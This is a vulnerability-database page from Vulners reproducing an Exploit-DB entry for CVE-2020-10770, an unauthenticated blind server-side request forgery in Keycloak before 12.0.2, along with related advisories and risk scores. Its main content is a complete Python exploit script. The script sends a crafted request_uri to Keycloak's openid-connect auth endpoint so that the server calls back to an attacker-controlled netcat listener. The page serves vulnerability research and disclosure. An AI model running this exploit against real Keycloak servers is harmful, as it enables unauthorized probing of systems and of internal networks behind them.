Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Keycloak 12.0.1 - 'request_uri ' Blind Server-Side Request Forgery (SSRF) (Unauthenticated)

🗓️ 13 Oct 2021 00:00:00Reported by Mayank DeshmukhType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 639 Views

Keycloak blind SSRF exploit for versions < 12.0.

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Keycloak 12.0.1 - (request_uri) Blind Server-Side Request Forgery (Unauthenticated) Exploit
13 Oct 202100:00
zdt
ATTACKERKB		CVE-2023-44469
29 Sep 202307:15
attackerkb
Circl		CVE-2020-10770
15 Dec 202022:40
circl
CNNVD		红帽 Red Hat Keycloak 代码问题漏洞
26 Nov 202000:00
cnnvd
CNVD		Red Hat Keycloak Server-Side Request Forgery Vulnerability
27 Nov 202000:00
cnvd
CVE		CVE-2020-10770
15 Dec 202000:00
cve
Cvelist		CVE-2020-10770
15 Dec 202000:00
cvelist
GithubExploit		Exploit for Server-Side Request Forgery in Redhat Keycloak
13 Oct 202108:40
githubexploit
Github Security Blog		Keycloak vulnerable to Server-Side Request Forgery
24 May 202217:36
github
Hacker One		MTN Group: SSRF Keycloak before 13.0.0 - CVE-2020-10770 on https://sponsoredata.mtn.ci
23 Oct 202103:13
hackerone
Rows per page
# Exploit Title: Keycloak 12.0.1 - 'request_uri ' Blind Server-Side Request Forgery (SSRF) (Unauthenticated)
# Date: 2021-10-09
# Exploit Author: Mayank Deshmukh
# Vendor Homepage: https://www.keycloak.org/
# Software Link: https://www.keycloak.org/archive/downloads-12.0.1.html
# Version: versions < 12.0.2
# Tested on: Kali Linux
# CVE : CVE-2020-10770

#!/usr/bin/env python3

import argparse, textwrap
import requests
import sys

parser = argparse.ArgumentParser(description="-=[Keycloak Blind SSRF test by ColdFusionX]=-", formatter_class=argparse.RawTextHelpFormatter, 
epilog=textwrap.dedent(''' 
Exploit Usage : 
./exploit.py -u http://127.0.0.1:8080
[^] Input Netcat host:port -> 192.168.0.1:4444
'''))                     

parser.add_argument("-u","--url", help="Keycloak Target URL (Example: http://127.0.0.1:8080)") 
args = parser.parse_args()

if len(sys.argv) <= 2:
    print (f"Exploit Usage: ./exploit.py -h [help] -u [url]")          
    sys.exit()  

# Variables
Host = args.url

r = requests.session()

def ssrf():
    headerscontent = {
            'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
                     }
    hook = input("[^] Input Netcat host:port -> ")
    
    _req = r.get(f'{Host}/auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://{hook}', headers = headerscontent)
    return True

if __name__ == "__main__":

    print ('\n[+] Keycloak Bind SSRF test by ColdFusionX \n ')
    try:    
        if ssrf() == True:
            print ('\n[+] BINGO! Check Netcat listener for HTTP callback :) \n ')
    
    except Exception as ex:
        print('\n[-] Invalid URL or Target not Vulnerable')

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
13 Oct 2021 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 25
CVSS 3.15.3
EPSS0.92282
keycloakblind ssrfexploitunauthenticatedcoldfusionxhttpcve-2020-10770
639